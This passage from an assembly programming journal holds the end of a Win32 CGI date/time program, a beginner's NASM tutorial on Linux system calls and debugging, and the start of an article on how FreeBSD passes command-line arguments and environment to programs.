     call    .ascii                               ;Convert and place into HTML

     mov     ax, [Time.wDay]
     mov     edi, HTML.Date_S + 4
     call    .ascii

     mov     ax, [Time.wMonth]
     mov     edi, HTML.Date_S + 1
     call    .ascii

     mov     edi, HTML.Day_S                      ;Destination Ptr
     mov     esi, Day.Wk                          ;Source Ptr (Array of Days)
     xor     eax, eax
     mov     ax, [Time.wDayOfWeek]                ;0 <= eax < 7
     add     esi, eax                             ;esi += eax * 3
     add     esi, eax                             ; Indexes the Array
     add     esi, eax
     mov     ecx, 3                               ;3B per Day String
     cld                                          ;Copy Left to Right
     rep                                          ;    (esi++, edi++)
     movsb

     mov     ax, [Time.wHour]
     cmp     al, 12                               ;Check for PM (noon or later)
     jl      .wHour
     mov     [HTML.Time_S + 9], 'P'               ; AM -> PM (flags unchanged)
     je      .wHour                               ;12 PM needs no correction
     sub     al, 12                               ;Correct Hour (13..23 -> 1..11)

.wHour:
     mov     edi, HTML.Time_S + 1
     call    .ascii

     mov     ax, [Time.wMinute]
     mov     edi, HTML.Time_S + 4
     call    .ascii

     mov     ax, [Time.wSecond]
     mov     edi, HTML.Time_S + 7
     call    .ascii
     ret

;***-------------------------[Subroutine]--------------------------***
.ascii:
     std                                          ;String OPs Right to Left
     cmp     ax, 10                               ;Single Digit?
     jl      .onex10

     and     ah, ah                               ;Only Two Digits
     jz      .twox16

     mov     bh, 10                               ;Reduce 3x16 to 2x16
     div     bh                                   ;  so that AAM can be used
     or      ah, 0x30                             ;BCD -> ASCII
     mov     [edi], ah
     dec     edi
.twox16:
     aam                                          ; AL / 10 = AH r AL
     or      al, 0x30                             ;BCD -> ASCII
     stosb
     mov     al, ah
     cmp     ah, 9
     jg      .twox16
.onex10:
     or      al, 0x30
     stosb                                        ;Copy Last/Only Digit to Mem
     ret

;***--------------------[Data used by this App]--------------------***
section '.data' data readable writeable
   StdIn         dd 0                             ;Standard I/O Handles
   StdOut        dd 0

HTML:
db 'Content-type: text/html', Cr, Lf, Cr, Lf
db '<html><head><title>Hello World</title></head>', Cr, Lf
db '<body bgcolor=Black text=Cyan><h1>Hello World</h1>', Cr, Lf
db '<h2><font color=Lime>', Cr, Lf
db 'This HTML is dynamically generated by a PE console Application written in '
db '80x86 Assembler</font></h2>', Cr, Lf
db '<h2><font color=Red>It is: </font><font color=Blue>'
    .Day_S       db 'WkD '
    .Date_S      db ' 0/00/0000</font> <font color=Magenta>'
    .Time_S      db ' 0:00:00 AM</font> <font color=Lime>UTC</font></h2>', Cr, Lf
                 db '</body></html>', Cr, Lf
HTML._size     = $ - HTML - 1
HTML.Len        dd 0                            ;Number of bytes actually written

   Time          SYSTEMTIME
   Day.Wk        db 'SunMonTueWedThuFriSat'

;***----------------------[Import Table / IAT]---------------------***
section '.idata' import data readable writeable

library     kernel,             'KERNEL32.DLL'

kernel:
   import    GetModuleHandle,    'GetModuleHandleA',\
             GetCommandLine,     'GetCommandLineA',\
             GetSystemTime,      'GetSystemTime',\
             GetEnvVar,          'GetEnvironmentVariableA',\
             GetStdHandle,       'GetStdHandle',\
             CreateFile,         'CreateFileA',\
             ReadFile,           'ReadFile',\
             WriteFile,          'WriteFile',\
             CloseHandle,        'CloseHandle',\
             ExitProcess,        'ExitProcess'
__________________|||-------------------[/code]-------------------|||
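
The two data-manipulation steps in Format_Time, writing a number's digits from
right to left and picking a three-letter day name out of a packed array, may be
easier to follow in C. The sketch below mirrors the idea only; put_decimal and
put_weekday are hypothetical names, and the template strings in the usage are
copied from the HTML data above.

```c
#include <assert.h>
#include <string.h>

/* Write `value` in decimal so that its last digit lands at buf[last],
 * filling toward lower indexes, the way .ascii works with STD and STOSB.
 * Bytes to the left of the first digit are left untouched. */
void put_decimal(char *buf, int last, unsigned value)
{
    assert(buf != NULL && last >= 0);
    do {
        buf[last--] = (char)('0' + value % 10);
        value /= 10;
    } while (value != 0 && last >= 0);
}

/* Copy the three-letter name for wDayOfWeek (0 = Sunday) into dst.
 * The index is multiplied by 3 because every name is 3 bytes long. */
void put_weekday(char *dst, unsigned day_of_week)
{
    static const char names[] = "SunMonTueWedThuFriSat";
    assert(dst != NULL && day_of_week < 7);
    memcpy(dst, names + 3 * day_of_week, 3);
}
```

Calling put_decimal on the ' 0/00/0000' template with the offsets 9, 4 and 1
fills in the year, day and month, just as the three calls to .ascii do.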


How to Run
----------
You can run this example from the command line since it requires no client
data.  You can also redirect the output into an HTML file and open it with IE:
     Main > Text.html
For the real CGI, place Main.exe into the cgi-bin directory, launch Apache, and
type "localhost/cgi-bin/Main.exe" in the address box of IE.


References
----------
     SAMS Teach Yourself CGI in 24 Hours
             SAMS 2000                                   $24.99US
             Rafe Colburn                                ISBN: 0-672-31880-6

     CGI by Example
             QUE 1996                                    $34.99US
             Robert Niles & Jeffry Dwight                ISBN: 0-7897-0877-9

     HTML in Plain English - 2nd Edition
             MIS Press 1998                              $19.95US
             Sandra E. Eddy                              ISBN: 1-55828-587-3

     Cascading Style Sheets - The Definitive Guide
             O'Reilly 2000                               $34.95US
             Eric A. Meyer                               ISBN: 1-56592-622-6

     Win32 Programming Reference (Win32 API Help file)
             Microsoft 1990-1995                         Free
             http://win32asm.rxsp.com/files/win32api.zip

Contact
-------
eet_1024@...



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                              Writing A Useful Program With NASM
                                              by Jonathan Leto


Intro
-----
Much fun can be had with assembly programming, and it gives you a much deeper
understanding of the inner workings of your processor and kernel. This article
is geared towards the beginning assembly programmer who can't seem to justify
why he is doing something as masochistic as writing an entire program in
assembly language. If you don't already know one or more other programming
languages, you really have no business reading this. Many constructs will also
be explained in terms of C. You should also be familiar with the command line
options of NASM; there is no sense going over them again here.


Getting Started
---------------
So you want to write a program that actually DOES something. "Hello, world"
isn't cutting it anymore. First, an overview of the various parts of an
assembly program: (For terse documentation, the NASM manual is the place to
go.)


The .data section
-----------------
This section is for defining constants, such as filenames or buffer sizes;
this data does not change at runtime. The NASM documentation has a good
description of how to use the db, dd, etc. pseudo-instructions that are used
in this section.


The .bss section
----------------
This section is where you declare your variables.
They look something like this:

         filename:       resb    255     ; REServe 255 Bytes
         number:         resb    1       ; REServe 1 Byte
         bignum:         resw    1       ; REServe 1 Word (1 Word = 2 Bytes)
         longnum:        resd    1       ; REServe 1 Double Word
         pi:             resq    1       ; REServe 1 double precision float
         morepi:         rest    1       ; REServe 1 extended precision float
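
Since this article leans on C for comparison, here is roughly what the
reservations above would look like as C declarations. This is a sketch under
the assumption of a typical x86 compiler, where double is 8 bytes; the 10-byte
array stands in for the extended precision float because C has no portable
type of exactly that size.

```c
#include <assert.h>
#include <stdint.h>

/* File-scope objects without an initializer start out zero-filled and are
 * typically placed in .bss, much like the NASM reservations. */
uint8_t  filename[255];   /* resb 255 */
uint8_t  number;          /* resb 1   */
uint16_t bignum;          /* resw 1   */
uint32_t longnum;         /* resd 1   */
double   pi;              /* resq 1   */
uint8_t  morepi[10];      /* rest 1, kept as 10 raw bytes */

/* Assumption of this sketch: double occupies 8 bytes, like resq. */
static_assert(sizeof(double) == 8, "resq reserves 8 bytes");
```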


The .text section
-----------------
This is where the actual assembly code is written. The term "self modifying
code" means a program which modifies this section while being executed.


In The Beginning ...
--------------------
The next thing you have probably noticed while looking at the source of
various assembly programs is that there always seems to be "global _start" or
something similar at the beginning of the .text section. This exports the
_start label so that the linker can record it as the entry point, which is how
the kernel knows where program execution begins. It is, to my knowledge, much
like the main function in C, except that it is not a function, just a starting
point.


The Stack and Stuff
-------------------
Also like in C, the kernel sets up the environment with all of the environment
variables, and sets up **argv and argc. Just in case you forgot, **argv is an
array of strings that are all of the arguments given to the program, and argc
is the count of how many there are.  These are all put on the stack. If you
have taken Computer Science 101, or read any type of introductory computer
science book, you should know what a stack is. It is a way of storing data so
that the last thing you put in is the first that comes out. This is fine and
dandy, but most people don't seem to grasp what this has to do with their
computer. "The stack", as it is ominously referred to, is just your RAM.
That's it.  It is your RAM organized in such a way that when you "push"
something onto "The stack", all you are doing is saving something in RAM. And
when you "pop" something off of "The stack", you are retrieving the last thing
you put in, which is on the top.

Ok, now let's look at some code that you are likely to see.

         section .text           ; declaring our .text segment
                 global  _start  ; telling where program execution should start

         _start:                 ; this is where code starts getting exec'ed
                 pop     ebx     ; get first thing off of stack, put into ebx
                 dec     ebx     ; decrement the value of ebx by one
                 pop     ebp     ; get next 2 things off stack, one after the
                 pop     ebp     ; other, and put each into ebp

What does this code do? It puts the number of real arguments into ebx and a
pointer to the first actual argument into ebp. Let's say we ran the program on
the command line as so:

         $ ./program 42 A

When we are at the _start line, the stack looks something like this (each
argv entry is really a pointer to the string shown):

         -----------
         | 3       |     The number of arguments, including argv[0],
         |         |     which is the program name
         -----------
         |"program"|     argv[0]
         -----------
         | "42"    |     argv[1] NOTE: This is the character "4" and "2",
         |         |     not the number 42
         -----------
         | "A"     |     argv[2]
         -----------

So, the first instruction, "pop ebx", took the 3, and put it into ebx.
Then we decrement it by one, because the program name isn't really an
argument.

Depending on whether you need the argument count later on, you will see the
other arguments popped into either the same register or a different one.

Now, "pop ebp" puts a pointer to the program name into ebp, and then the next
"pop ebp" overwrites it, and puts a pointer to "42" into ebp. The previous
value of ebp is not preserved, and since you have popped it off of the stack,
it is gone forever.
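
If the pops are hard to picture, the same walk can be simulated in C. This is
only a model: the "stack" is an ordinary array of machine words, and
fake_stack, pop and first_real_arg are hypothetical names made up for the
sketch.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* A simulated initial stack: the argument count, then one pointer per
 * argument, then a zero word. Each slot is one machine word. */
typedef struct {
    const uintptr_t *sp;    /* plays the role of esp */
} fake_stack;

/* "pop": return the word on top and move the stack pointer past it. */
static uintptr_t pop(fake_stack *s)
{
    assert(s != NULL && s->sp != NULL);
    return *s->sp++;
}

/* Mirror of the fragment: pop argc and decrement it, then pop twice so that
 * the second pop overwrites the program name with the first real argument. */
const char *first_real_arg(fake_stack *s, uintptr_t *nargs)
{
    uintptr_t ebx = pop(s);                    /* argc                      */
    ebx--;                                     /* program name doesn't count */
    const char *ebp = (const char *)pop(s);    /* argv[0]                   */
    ebp = (const char *)pop(s);                /* argv[1]; argv[0] is lost  */
    *nargs = ebx;
    return ebp;
}
```

With the "./program 42 A" stack from the diagram, nargs ends up as 2 and the
returned pointer refers to the string "42".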


Doing more interesting things
-----------------------------
Moving on, how exactly do you interact with the rest of the system? You know
how to manipulate the stack, but how do you get the current time, or make a
directory, or fork a process, or do any other wonderful thing a Unix box can
do? I am pleased to introduce you to the "system call". A system call is the
translator that lets user-land programs (which is what you are writing) talk
to the kernel, which is in kernel-land, of course. Each syscall has a unique
number, so that you can put it into the eax register, and tell the kernel "Yo,
wake up and do this", and it hopefully will. If the syscall takes arguments,
which most do, these go into ebx, ecx, edx, esi, edi, ebp, in that order.

Some example code always helps:

         mov     eax,1           ; the exit syscall number
         mov     ebx,0           ; have an exit code of 0
         int     80h             ; interrupt 80h, the thing that pokes the
                                 ; kernel and says, "do this"

The preceding code is equivalent to having a "return 0" at the end of your
main function. Ok, ok, still not very useful, but we are getting there.

A more useful example:

         pop     ebx             ; argc
         pop     ebx             ; argv[0]
         pop     ebx             ; the first real arg, a filename


         mov     eax,5           ; the syscall number for open()
                                 ; we already have the filename in ebx

         mov     ecx,0           ; O_RDONLY, defined in fcntl.h

         int     80h             ; call the kernel

                                 ; now we have a file descriptor in eax

         test    eax,eax         ; lets make sure it is valid
         jns     file_function   ; if the sign flag is not set, the file
                                 ; descriptor is not negative and so is valid:
                                 ; jump to file_function

         mov     ebx,eax         ; there was an error: eax holds the negated
                                 ; errno, use it as the exit code in ebx
         mov     eax,1           ; put the exit syscall number in eax
         int     80h             ; bail out
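
The sign test above relies on a Linux convention: a raw system call signals
failure by returning the negated errno, a small negative number. A C sketch of
the same check follows; raw_syscall_failed and raw_syscall_errno are
hypothetical names, and the -4095 bound is the Linux convention as I
understand it, so treat it as an assumption on other systems.

```c
#include <assert.h>
#include <errno.h>

/* On Linux, a raw system call reports failure by returning the negated
 * errno, a value in the range -4095..-1. Anything else is a valid result. */
int raw_syscall_failed(long ret)
{
    return ret < 0 && ret >= -4095;
}

/* Recover the positive errno value from a failed raw return, 0 otherwise. */
int raw_syscall_errno(long ret)
{
    return raw_syscall_failed(ret) ? (int)-ret : 0;
}
```

For example, opening a file that does not exist leaves -ENOENT in eax, so
raw_syscall_errno would give back ENOENT.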

Now we are starting to get somewhere. You should be starting to realize that
there is no black magic or voodoo in assembly programming, just a very strict
set of rules.  If you know how the rules work, you can do just about
everything. Though I haven't tried it, I have seen network coding in assembly,
console graphics ( intros! ), and yes, even X windows code in assembly.

So where do you find out all of the semantics for all of the various system
calls? Well first, the numbers are listed in asm/unistd.h in Linux, and
sys/syscall.h in the *BSD's. To find out information about each one, such as
what arguments they take and what values they return, look no further than
your man pages! I will hold your hand in finding out about the next syscall we
are going to use, read().

"man read" didn't give you exactly what you wanted, did it? That is because
program manuals and shell manuals are shown before the programming manuals
are. If you are using bash, you are probably looking at the BASH_BUILTINS(1)
man page. To get to what you really want, try "man 2 read".  Now you should be
looking at sections like SYNOPSIS, DESCRIPTION, RETURN VALUE, ERRORS and a few
others. These are the most important. Take a look at the synopsis, it should
look like:

         ssize_t read(int fd, void *buf, size_t count);

NOTE: ssize_t and size_t are just integer types (signed and unsigned).

The first argument is the file descriptor, followed by the buffer, and then
how many bytes to read in, which should be however long the buffer is. A count
of 8192, which is 8k, is a good choice for performance. Make your buffer a
multiple of this; 8192 is fine. Now you know what to put in your registers.
Reading the RETURN VALUE section, you should see that read() returns the
number of bytes it read, 0 for EOF, and -1 for errors.

file_function:
         mov     ebx,eax         ; sys_open returned file descriptor into eax
         mov     eax,3           ; sys_read
                                 ; ebx is already setup
         mov     ecx,buf         ; we are putting the ADDRESS of buf in ecx
         mov     edx,bufsize     ; bufsize is assumed to be an equ constant,
                                 ; so this puts its VALUE in edx

         int     80h             ; call the kernel

         test    eax,eax         ; see what got returned
         jz      nextfile        ; got an EOF, go to read the next file
         js      error           ; got an error, bail out

                                 ; if we are here, then we actually read some
                                 ; bytes

Now we have a chunk of the file read ( up to 8192 bytes ), and sitting in what
you would call an array in C. What can you do now? Well, the first thing that
comes to mind is to print it out.  Wait a sec, there is no man page for printf
in section 2. What's the deal? Well, printf is a library function, implemented
by good ol' libc. You are going to have to dig a little deeper, and use
write(). So now you are looking at the man page. write() writes to a file
descriptor. What the hell good does that do me? I want to print it out! Well,
remember, everything in Unix is a file, so all you have to do is write to
STDOUT. In /usr/include/unistd.h, it is defined as 1. So the next chunk of
code looks like:

         mov     edx,eax         ; save the count of bytes for the write syscall
         mov     eax,4           ; system call for write
         mov     ebx,1           ; STDOUT file descriptor
                                 ; ecx is already set up
         int     80h             ; call kernel

         ; for the program to properly exit instead of segfaulting right here
         ; ( it doesn't seem to like to fall off the end of a program ), call
         ; a sys_exit

         mov     eax,1
         mov     ebx,0
         int     80h

What you have now just written is basically "cat", except it only prints the
first 8192 bytes.
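
For comparison, here is the same open/read/write sequence sketched in C, with
the one thing the assembly fragment lacks: a loop, so that files longer than
one buffer are copied completely. It uses the libc wrappers open(), read() and
write() rather than int 80h, and copy_file_to_fd is a hypothetical name chosen
for this example.

```c
#include <assert.h>
#include <fcntl.h>
#include <unistd.h>

#define BUFSIZE 8192

/* Copy the whole of `path` to descriptor `out_fd`, one 8k chunk at a time.
 * Returns the total number of bytes copied, or -1 on any error. */
long copy_file_to_fd(const char *path, int out_fd)
{
    static char buf[BUFSIZE];
    long total = 0;
    ssize_t n;

    assert(path != NULL);
    int fd = open(path, O_RDONLY);                 /* like sys_open */
    if (fd < 0)
        return -1;

    while ((n = read(fd, buf, sizeof buf)) > 0) {  /* read() gives 0 at EOF */
        ssize_t done = 0;
        while (done < n) {                         /* write() may be partial */
            ssize_t w = write(out_fd, buf + done, (size_t)(n - done));
            if (w < 0) {
                close(fd);
                return -1;
            }
            done += w;
        }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}
```

Passing 1 as out_fd prints the file on STDOUT, which is what the assembly
version does for its first chunk.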


Portability
-----------
In the preceding section, you saw how to call the kernel in Linux with NASM.
This is fine if you are never ever going to use another operating system, and
you enjoy looking up the system call numbers, but it is not very practical,
and extremely unportable. What to do?  There is a great little package called
asmutils started by Konstantin Boldyshev, who runs
http://www.linuxassembly.org. If you haven't read all of the good
documentation on that site, that should be your next step. Asmutils provides
an easy to use and portable interface for doing system calls in whichever Unix
variant you use ( and even has support for BeOS.)  Even if you aren't
interested in using these Unix utilities that are rewritten in assembly, if
you want to write portable NASM code, you are better off using its header
files than rolling your own.  With asmutils, your code will look like this:

         %include "system.inc"   ; all the magic happens here

         CODESEG                 ; .text section

         START:                  ; always starts here

         sys_write STDOUT,[somestring],[strlen]

         END                     ; code ends here

This is much more readable than doing everything by system call number, and it
will be portable across Linux, FreeBSD, OpenBSD, NetBSD, BeOS and a few other
lesser known OS's. You can now use system calls by name, and use standard
constants like STDOUT or O_RDONLY, just like in C.  The "%include" statement
works just like "#include" does in C, sourcing the contents of that file.

To learn more about how to use asmutils, read the Asmutils-HOWTO, which is in
the doc/ directory of the source. Also, to get the latest source, use the
following commands:

export CVS_RSH=ssh
cvs -d:pserver:anonymous@...:/cvsroot/asm login
cvs -z3 -d:pserver:anonymous@...:/cvsroot/asm co asmutils

This will download the newest, bleeding edge source into a subdirectory called
"asmutils" of your current directory. Take a look at some of the simpler
programs, such as cat, sleep, ln, head or mount, and you will see that there
isn't anything horrendously difficult about them. head was my first assembly
program, and I made extra comments on purpose, so that would be a good place
to start.


Debugging
---------
Strace will definitely be your friend. It is the easiest tool to use to debug
your problem. Most of the time when writing in assembly, other than syntax
errors, you will just get a segmentation fault. This provides you with ZERO
useful information. With strace, at least you will see after which system call
your program is choking. Example:

         $ strace ./cal2
         execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
         read(1, "", 0)                          = 0
         --- SIGSEGV (Segmentation fault) ---
         +++ killed by SIGSEGV +++

Now you know to look after your first read system call. But it starts getting
tricky when you have lots of pure assembly, which strace cannot show. That's
when gdb comes into play. There is some very good information about using gdb
and enabling debugging information in NASM in the Asmutils-HOWTO, so I won't
reproduce it here. For a quick and dirty solution, you could do something like
this:

         %define notdeadyet      sys_write STDOUT,0,__LINE__

Now you can litter the source with notdeadyet's, and hopefully see where
things are going astray with the help of strace. Obviously this is not
practical for complex bugs or voluminous source, but it works great for
finding careless mistakes when you are starting out. Example:

         $ strace ./cal2
         execve("./cal2", ["./cal2"], [/* 46 vars */]) = 0
         write(1, NULL, 16)                      = 16
         write(1, NULL, 26)                      = 26
         write(1, NULL, 41)                      = 41
         --- SIGSEGV (Segmentation fault) ---
         +++ killed by SIGSEGV +++

Now we know that we are still going at line 41, and the problem is after that.


Next ?
------
Now it is your turn to explore the insides of your operating system, and take
pride in understanding what's really going on under the covers.


Reference
---------
Places to get more information:

      Linux Assembly - http://www.linuxassembly.org
      NASM Manual ( available in doc/html directory of source )
      Assembly Programming Journal - http://asmjournal.freeservers.com/
      Mammon_'s textbase - http://www.eccentrica.org/Mammon/sprawl/textbase.html
      Art Of Assembly - http://webster.cs.ucr.edu/Page_asm/ArtOfAsm.html
      Sandpile - http://www.sandpile.org
      comp.lang.asm.x86
      NASM - http://www.cryogen.com/Nasm
      Asmutils-HOWTO - doc/ directory of asmutils


Feedback
--------
Feedback is welcome; hopefully this was of some use to budding Unix assembly
programmers.


Availability
------------
The most current version of this document should be available at
http://www.leto.net/papers/writing-a-useful-program-with-nasm.txt .


Appendix : Jumps
----------------
When I first began looking at assembly source code, I saw all these crazy
instructions like "jnz" and the like. It looked like I was going to have to
remember the names of a whole slew of inanely named instructions. But after a
while it finally clicked what they all were. They are basically just the "if
statements" that you know and love, working off of the EFLAGS register. What
is the EFLAGS register? Just a register with lots of different bits that are
set to zero or one, depending on the previous comparison that the code made.

Some code to set the stage:

         mov     eax,82
         mov     ebx,69

         cmp     eax,ebx
         jle     some_function

What on earth is "jle"? Why, it's "Jump if Less than or Equal." If eax is less
than or equal to ebx, code execution will jump to "some_function"; if not, it
keeps chugging along. Here is a list which will hopefully shed some light on
this part of assembly that was mysterious to me when I began. Some of these
are logically the same, but are provided because in some situations one will
be more intuitive than the other.

Jump                 Meaning            Signedness (S or U)
-----------------------------------------------------------
ja      | Jump if above                 |       U
jae     | Jump if above or Equal        |       U
jb      | Jump if below                 |       U
jbe     | Jump if below or Equal        |       U
jc      | Jump if Carry                 |
jcxz    | Jump if CX is Zero            |
je      | Jump if Equal                 |
jecxz   | Jump if ECX is Zero           |
jz      | Jump if Zero                  |
jg      | Jump if greater               |       S
jge     | Jump if greater or Equal      |       S
jl      | Jump if less                  |       S
jle     | Jump if less or Equal         |       S
jmp     | Unconditional jump            |
jna     | Jump Not above                |       U
jnae    | Jump Not above or Equal       |       U
jnc     | Jump if Not Carry             |
jne     | Jump if Not Equal             |
jng     | Jump if Not greater           |       S
jnge    | Jump if Not greater or Equal  |       S
jnl     | Jump if Not less              |       S
jnle    | Jump if Not less or Equal     |       S
jno     | Jump if Not Overflow          |
jnp     | Jump if Not Parity            |
jns     | Jump if Not signed            |
jnz     | Jump if Not Zero              |
jo      | Jump if Overflow              |
jp      | Jump if Parity                |
jpe     | Jump if Parity Even           |
jpo     | Jump if Parity Odd            |
js      | Jump if signed                |
-----------------------------------------------------------
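
To see why the S and U columns matter, it can help to model a comparison in C.
The sketch below computes the four flags a "cmp a,b" would set and evaluates a
few of the jumps from the table on them. It is a model for illustration, not
how you would write a comparison in C; flags, cmp32 and the lowercase jump
functions are names made up for this example.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* The four EFLAGS bits that the jumps below look at. */
typedef struct { bool zf, sf, cf, of; } flags;

/* Model of "cmp a,b": compute a - b and keep only the flags. */
flags cmp32(uint32_t a, uint32_t b)
{
    uint32_t r = a - b;
    flags f;
    f.zf = (r == 0);                           /* result is zero         */
    f.sf = (r >> 31) != 0;                     /* sign bit of the result */
    f.cf = (a < b);                            /* unsigned borrow        */
    f.of = (((a ^ b) & (a ^ r)) >> 31) != 0;   /* signed overflow        */
    return f;
}

bool ja (flags f) { return !f.cf && !f.zf; }        /* unsigned >  */
bool jb (flags f) { return f.cf; }                  /* unsigned <  */
bool jg (flags f) { return !f.zf && f.sf == f.of; } /* signed   >  */
bool jl (flags f) { return f.sf != f.of; }          /* signed   <  */
bool jle(flags f) { return f.zf || f.sf != f.of; }  /* signed   <= */
```

With eax = 82 and ebx = 69 as in the example, jle is not taken. Comparing
0FFFFFFFFh with 1 shows the difference between the two families: ja is taken
because the value is large when read as unsigned, while jg is not, because the
same bits read as signed are -1.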



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                         Command Line in FreeBSD
                                                         by G. Adam Stanislav


In my Issue 8 article I mentioned I did not know how command line parameters
(or arguments) were passed to programs under FreeBSD. I have received some
feedback, both from the FreeBSD community and APJ readers.

Thanks to that feedback, I can now pass this information on to you. Further,
this information should be valid, more or less, for all 386 based Unix and
Unix-like operating systems. At any rate, if your Unix variety does not come
with the information on its command line parameters, chances are that, if you
adjust my sample code to use the kernel interface of your OS, it will work
just fine.


Code startup
------------
Unix is much more security-conscious than MS DOS and MS Windows. While
DOS/Windows assembly language programmers may be used to the operating system
loading their code and then CALLing it (so you can exit with a simple RET, and
possibly crash the system), Unix creates a new process for each program. This
process is separate from the kernel and from all other processes. Hence, the
system does not CALL your code, it JMPs to it. If you issue a RET, you will
crash your program, but Unix will continue running unharmed. At least that's
the theory. However, under FreeBSD it is the practice as well: I tried it and
can vouch for it.


The top of the stack
--------------------
Before the Unix system jumps to your code, it pushes some information on the
top of the stack: your stack, that is, not the system stack, so you can access
it all from your own code. Here is what the stack contains, starting at the
top:

         number of arguments ("argc")
         argument 0
         argument 1
         ...
         argument n (n = argc - 1)
         NULL pointer
         environment 0
         environment 1
         ...
         environment n
         NULL pointer

Not all of these are necessarily there (e.g., if the program was called with
no arguments). However, the number of arguments, argument 0, and the two NULL
pointers are always present.

Argument 0 is not a command line parameter in the sense DOS programmers are
used to. Instead, it is the name of the program. C programmers will know it as
the familiar argv[0].

Another important difference between DOS and Unix is that DOS programs just
give you the full command line, i.e., whatever appears after the name of the
program, including any leading and trailing blanks. It is then up to the
programmer to strip all extra blanks.

Compared to that, parsing the Unix command line is much simpler as the system
does some of the hard work for you. The individual arguments are separated,
and usually contain no leading/trailing blanks. When they do, they are there
because the program caller wanted them there.

Let me illustrate. Suppose the user has typed the following command:

         ./args Hello, world. Here I come!

In that case, the top of the stack will look like this:

         6
         ./args
         Hello,
         world.
         Here
         I
         come!
         0
         environment 0
         environment 1
         ...
         environment n
         0

The arguments are nicely separated and contain no blanks. Now, suppose the
user has typed:

         ./args Hello, world. "Here I come!"

The top of the stack looks like this:

         4
         ./args
         Hello,
         world.
         Here I come!
         0
         (etc)

This system, besides making it easier to parse, has a great advantage over the
DOS way: It has no practical limit on the size of the command line.

Accessing the information
-------------------------
Because your program runs in its own process space, the stack is yours to do
with as you please. You can simply save the information in some data structure
and leave the stack intact, or you can pop it off as you need it.

The C startup code uses the first approach: It saves the "argc" value in a
local variable, and the address of argument 0 in another. It finds the start
of the environment variable list and stores it in a global variable. It then
calls main, passing that information to it, i.e. main(argc, argv, env);
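
As a rough picture of that first approach, here is a C sketch that takes a
pointer to the top of the initial stack and finds the argument and environment
lists without popping anything. It is not the real FreeBSD startup code:
startup_info and read_startup are hypothetical names, and the stack is modeled
as an array of pointers whose first slot holds the count.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    uintptr_t          argc;   /* number of arguments, program name included */
    const char *const *argv;   /* argument 0 .. argument argc-1, then NULL   */
    const char *const *envp;   /* "name=value" strings, then NULL            */
    size_t             envc;   /* how many environment strings were found    */
} startup_info;

/* `top` points at the slot holding argc. The arguments follow it directly,
 * and the environment list starts right after the arguments' NULL pointer. */
startup_info read_startup(const char *const *top)
{
    startup_info s;
    assert(top != NULL);
    s.argc = (uintptr_t)top[0];       /* first slot is a count, not a pointer */
    s.argv = top + 1;
    s.envp = s.argv + s.argc + 1;     /* skip the arguments and their NULL    */
    s.envc = 0;
    while (s.envp[s.envc] != NULL)    /* count up to the second NULL          */
        s.envc++;
    return s;
}
```

Given the stack for ./args Hello, world. "Here I come!", argc is 4, argv[3]
is "Here I come!", and envp points just past the first NULL.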

The assembly language program can do that as well, but usually has no need to.
If you process the command line at the start of your code, and never need to
see it again, you can just pop it off the stack one by one, analyze it, set up
any flags or other variables, etc.
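
The pop-it-off approach can be modelled outside assembly, too. The sketch
below is only a model: it treats the initial stack as a Python list laid out
as described above (count, strings, 0, environment, 0) and consumes it from
the top. The name parse_initial_stack and the sample values are assumptions
made for this illustration:

```python
def parse_initial_stack(stack):
    """Consume a list laid out like the stack at program entry:
    argc, argv[0] .. argv[argc-1], 0, env[0] .. env[n], 0.
    Returns (program_name, arguments, environment)."""
    items = list(stack)              # work on a copy; index 0 is the top
    argc = items.pop(0)
    if argc < 1:
        raise ValueError("argc must be at least 1")
    program = items.pop(0)           # argv[0]

    arguments = []
    while True:
        item = items.pop(0)
        if item == 0:                # NULL pointer ends the argument list
            break
        arguments.append(item)

    environment = []
    while True:
        item = items.pop(0)
        if item == 0:                # NULL pointer ends the environment
            break
        environment.append(item)

    return program, arguments, environment

sample = [4, './args', 'Hello,', 'world.', 'Here I come!', 0,
          'HOME=/root', 'TERM=xterm', 0]
print(parse_initial_stack(sample))
```

Note that, just like the assembly version, the loops never look at argc
again once the program name has been taken; the terminating 0 is enough.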

I have enclosed a simple assembly language program called args.asm below. All
it does is print all the information the FreeBSD system has passed to it. It
is useful as an example of one way of accessing the command line arguments
(and the environment) by simply popping it off one at a time.

It is also useful as a tool to study what format the arguments are in. For
example, running it will show you that the environment is passed to your
program in the form of name=value, where name is the name of the environment
variable, value is whatever text string is assigned to it.
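
As a small illustration of that format (a sketch, not something args.asm
does), one entry can be split at the first '=' sign. The function name
split_env is hypothetical:

```python
def split_env(entry):
    """Split one 'name=value' environment string at the first '='.
    Everything after that first '=' belongs to the value."""
    name, _, value = entry.partition('=')
    return name, value

print(split_env('PATH=/bin:/usr/bin'))
print(split_env('PS1=a=b'))
```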

You can assemble the program with NASM and link it with ld:

         nasm -f elf args.asm
         ld -o args args.o
         strip args

Try running it with and without command line arguments. Try placing the
arguments in single and double quotes, try all the nifty things a Unix shell
will let you do, such as:

         ./args $HOME
         ./args `ls -la`
         ./args "`ls -la`"
         ./args '`ls -la`'
         ./args
         ./args Hello, world. Here I come!
         ./args Hello, world. "Here I come!"
         ./args '      Hello,    world.   Here    I   come !   '

;-----------------------------------------------------------------------------;
; args.asm
;
; Print FreeBSD command line arguments and environment
;
; Copyright 2000 G. Adam Stanislav
; All rights reserved
;-----------------------------------------------------------------------------;

section .data

prgmsg  db      'Program name:', 0Ah, 0Ah
tab     db      9
prglen  equ     $-prgmsg
argmsg  db      0Ah, 0Ah, 'Command line arguments:', 0Ah, 0Ah
arglen  equ     $-argmsg
envmsg  db      0Ah, 'Environment variables:', 0Ah, 0Ah
envlen  equ     $-envmsg
huhmsg  db      "Hmmm... Something's wrong here...", 0Ah
huhlen  equ     $-huhmsg

section .text

what.the.heck:
         ; Print the huhmsg to stderr and abort.
         push    dword huhlen
         push    dword huhmsg
         sub     eax, eax
         mov     al, 2           ; stderr
         push    eax
         add     al, al          ; SYS_write
         push    eax
         int     80h
         ; No need to clean up the stack since we're quitting now.

         sub     eax, eax
